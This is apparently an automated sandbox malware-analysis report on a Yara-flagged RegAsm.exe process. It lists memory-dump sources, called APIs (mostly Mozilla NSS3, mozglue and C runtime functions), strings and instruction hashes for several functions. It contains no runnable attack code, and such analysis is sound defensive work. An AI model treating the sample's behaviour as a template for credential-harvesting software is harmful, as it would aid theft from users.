                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1872382454-0
                                                                                                        • Opcode ID: 8e05d2091bf5a233ba5bd44b45cdb16d403e8ee62f2841894401e909d24ce843
                                                                                                        • Instruction ID: 31835a6b2e492843d4a6e50b2fc420533b2badb8656407d22ce0ad1ed90c5983
                                                                                                        • Opcode Fuzzy Hash: 8e05d2091bf5a233ba5bd44b45cdb16d403e8ee62f2841894401e909d24ce843
                                                                                                        • Instruction Fuzzy Hash: 41018CB57112408FDF00EF28CC8AB957BBCAB67719F080209FC4983B96D736E440CA22
                                                                                                        Function 6C2CADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteCriticalSection.KERNEL32(6C2CA6D8), ref: 6C2CAE0D
                                                                                                        • free.MOZGLUE(?), ref: 6C2CAE14
                                                                                                        • DeleteCriticalSection.KERNEL32(6C2CA6D8), ref: 6C2CAE36
                                                                                                        • free.MOZGLUE(?), ref: 6C2CAE3D
                                                                                                        • free.MOZGLUE(00000000,00000000,?,?,6C2CA6D8), ref: 6C2CAE47
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CriticalDeleteSection
                                                                                                        • String ID:
                                                                                                        • API String ID: 682657753-0
                                                                                                        • Opcode ID: f756b9163565ff3e0f8d0897dc83854f083fba03c554330e2604dfd97cc9e76f
                                                                                                        • Instruction ID: d1580b0384394ba8fac1218bcd2bd8f0352f68da94ab335c78d78487c2bdae8f
                                                                                                        • Opcode Fuzzy Hash: f756b9163565ff3e0f8d0897dc83854f083fba03c554330e2604dfd97cc9e76f
                                                                                                        • Instruction Fuzzy Hash: CBF062B6301A06A7CB109F68A809957B77CFE86775714032DF52A83980D731E115C7E6
                                                                                                        Function 00426719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getptd.LIBCMT ref: 00426725
                                                                                                          • Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
                                                                                                          • Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964
                                                                                                        • __getptd.LIBCMT ref: 0042673C
                                                                                                        • __amsg_exit.LIBCMT ref: 0042674A
                                                                                                        • __lock.LIBCMT ref: 0042675A
                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0042676E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 938513278-0
                                                                                                        • Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                        • Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
                                                                                                        • Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
                                                                                                        • Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D
                                                                                                        Function 6C0BD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0CCBE8: GetCurrentProcess.KERNEL32(?,6C0931A7), ref: 6C0CCBF1
                                                                                                          • Part of subcall function 6C0CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0931A7), ref: 6C0CCBFA
                                                                                                        • EnterCriticalSection.KERNEL32(6C11E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD4F2
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD50B
                                                                                                          • Part of subcall function 6C09CFE0: EnterCriticalSection.KERNEL32(6C11E784), ref: 6C09CFF6
                                                                                                          • Part of subcall function 6C09CFE0: LeaveCriticalSection.KERNEL32(6C11E784), ref: 6C09D026
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD52E
                                                                                                        • EnterCriticalSection.KERNEL32(6C11E7DC), ref: 6C0BD690
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0CD1C5), ref: 6C0BD751
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                        • String ID: MOZ_CRASH()
                                                                                                        • API String ID: 3805649505-2608361144
                                                                                                        • Opcode ID: e95831740d4930c766c5089f4a8ba9e0c5eb7535a38da58d17686e35c04e7856
                                                                                                        • Instruction ID: 1b1784a911c2e55527aeddf2407039a3f76969507eebe2b6684b2280f1e3d4a4
                                                                                                        • Opcode Fuzzy Hash: e95831740d4930c766c5089f4a8ba9e0c5eb7535a38da58d17686e35c04e7856
                                                                                                        • Instruction Fuzzy Hash: D651F271A087018FD324CF68C19475ABBE5EF89304F54492ED5AAD7F88E775E800CB92
                                                                                                        Function 6C0EB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C094290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C0D3EBD,6C0D3EBD,00000000), ref: 6C0942A9
                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C0EB127), ref: 6C0EB463
                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0EB4C9
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C0EB4E4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _getpidstrlenstrncmptolower
                                                                                                        • String ID: pid:
                                                                                                        • API String ID: 1720406129-3403741246
                                                                                                        • Opcode ID: d667d2bdce7b1c5a9d0810753291dfbe3b2fc9d942c1c71345199d5b52e710cb
                                                                                                        • Instruction ID: b2619e92b7d35c81cafc20f7fbc42b18140363a7bec2851245458b6cd7f9fcc0
                                                                                                        • Opcode Fuzzy Hash: d667d2bdce7b1c5a9d0810753291dfbe3b2fc9d942c1c71345199d5b52e710cb
                                                                                                        • Instruction Fuzzy Hash: 1231FEB1A413089FDB10DFA9D880BAEB7F5BF09318F540529E81267A41D732E949CBA5
                                                                                                        Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0041009A
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
                                                                                                          • Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
                                                                                                          • Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00410139
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0041014D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                        • String ID: vector<T> too long
                                                                                                        • API String ID: 2448322171-3788999226
                                                                                                        • Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
                                                                                                        • Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
                                                                                                        • Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
                                                                                                        • Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48
                                                                                                        Function 6C146C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C146D36
                                                                                                        Strings
                                                                                                        • database corruption, xrefs: 6C146D2A
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C146D2F
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C146D20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 632333372-598938438
                                                                                                        • Opcode ID: 3d4efa1ebb5724d9c2559b3950374d7669c980d63324b87fb943220700abf5e7
                                                                                                        • Instruction ID: 71c078d43ee8a655055ac27534b5d8d795f55e07112e5924cac5904d5e034259
                                                                                                        • Opcode Fuzzy Hash: 3d4efa1ebb5724d9c2559b3950374d7669c980d63324b87fb943220700abf5e7
                                                                                                        • Instruction Fuzzy Hash: CA21E0706003099BC710CF2AD841B9AB7E2AF8431CF24852DD88A9BF51E371E9498B92
                                                                                                        Function 6C222FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+"l,6C2232C2,<+"l,00000000,00000000,?), ref: 6C222FDA
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C22300B
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C22302A
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                          • Part of subcall function 6C1FC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C1FC45D
                                                                                                          • Part of subcall function 6C1FC3D0: TlsGetValue.KERNEL32 ref: 6C1FC494
                                                                                                          • Part of subcall function 6C1FC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C1FC4A9
                                                                                                          • Part of subcall function 6C1FC3D0: PR_Unlock.NSS3(?), ref: 6C1FC4F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                        • String ID: <+"l
                                                                                                        • API String ID: 2538134263-1276598871
                                                                                                        • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                        • Instruction ID: b8a6eb85774c7502f5c3e7772b416b50464d65b2e543eea01278fa04431e7e02
                                                                                                        • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                        • Instruction Fuzzy Hash: AD11C4B6B0010C6BDB008E659C00B9BB7D9AB84668F184134FD1CD7780EB76EA15C7A1
                                                                                                        Function 00413390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strtok_s.MSVCRT ref: 004133AF
                                                                                                        • StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                        • strtok_s.MSVCRT ref: 00413424
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: strtok_s$lstrcpylstrlen
                                                                                                        • String ID: "xA
                                                                                                        • API String ID: 348468850-582338916
                                                                                                        • Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
                                                                                                        • Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
                                                                                                        • Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
                                                                                                        • Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98
                                                                                                        Function 6C27CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C27CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C27CC7B), ref: 6C27CD7A
                                                                                                          • Part of subcall function 6C27CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C27CD8E
                                                                                                          • Part of subcall function 6C27CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C27CDA5
                                                                                                          • Part of subcall function 6C27CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C27CDB8
                                                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C27CCB5
                                                                                                        • memcpy.VCRUNTIME140(6C3114F4,6C3102AC,00000090), ref: 6C27CCD3
                                                                                                        • memcpy.VCRUNTIME140(6C311588,6C3102AC,00000090), ref: 6C27CD2B
                                                                                                          • Part of subcall function 6C199AC0: socket.WSOCK32(?,00000017,6C1999BE), ref: 6C199AE6
                                                                                                          • Part of subcall function 6C199AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C1999BE), ref: 6C199AFC
                                                                                                          • Part of subcall function 6C1A0590: closesocket.WSOCK32(6C199A8F,?,?,6C199A8F,00000000), ref: 6C1A0597
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                                                        • API String ID: 1231378898-412307543
                                                                                                        • Opcode ID: 0c525c1715b21b8c81c9e0d3864812548da09d1addda63a06bb40905c113166e
                                                                                                        • Instruction ID: 5579c7b724f00880ec91291037edf4878b740fe7fa8e9321f26ed524c330182d
                                                                                                        • Opcode Fuzzy Hash: 0c525c1715b21b8c81c9e0d3864812548da09d1addda63a06bb40905c113166e
                                                                                                        • Instruction Fuzzy Hash: B511D6F5B002489EDB509F6E8C477C2BABCA366718F002229E906DBF41EB71C4048BD7
                                                                                                        Function 6C13A8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C26A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C28C3A2,?,?,00000000,00000000), ref: 6C26A528
                                                                                                          • Part of subcall function 6C26A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C26A6E0
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C13A94F
                                                                                                        Strings
                                                                                                        • database corruption, xrefs: 6C13A943
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C13A948
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C13A939
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log$_byteswap_ushort
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 491875419-598938438
                                                                                                        • Opcode ID: f936c69e5b3461815f90951e089b4a59b159688387ecd228e2a5c9f798dbcb6c
                                                                                                        • Instruction ID: 501a0990997f58f8acf8d540cb349e500c9d043660f63782a14e93e211d5d9a3
                                                                                                        • Opcode Fuzzy Hash: f936c69e5b3461815f90951e089b4a59b159688387ecd228e2a5c9f798dbcb6c
                                                                                                        • Instruction Fuzzy Hash: 4D012B31F0021C5BC710CABADC11B9BB3F4AB4830CF454439DD5D6BA80D771A8088791
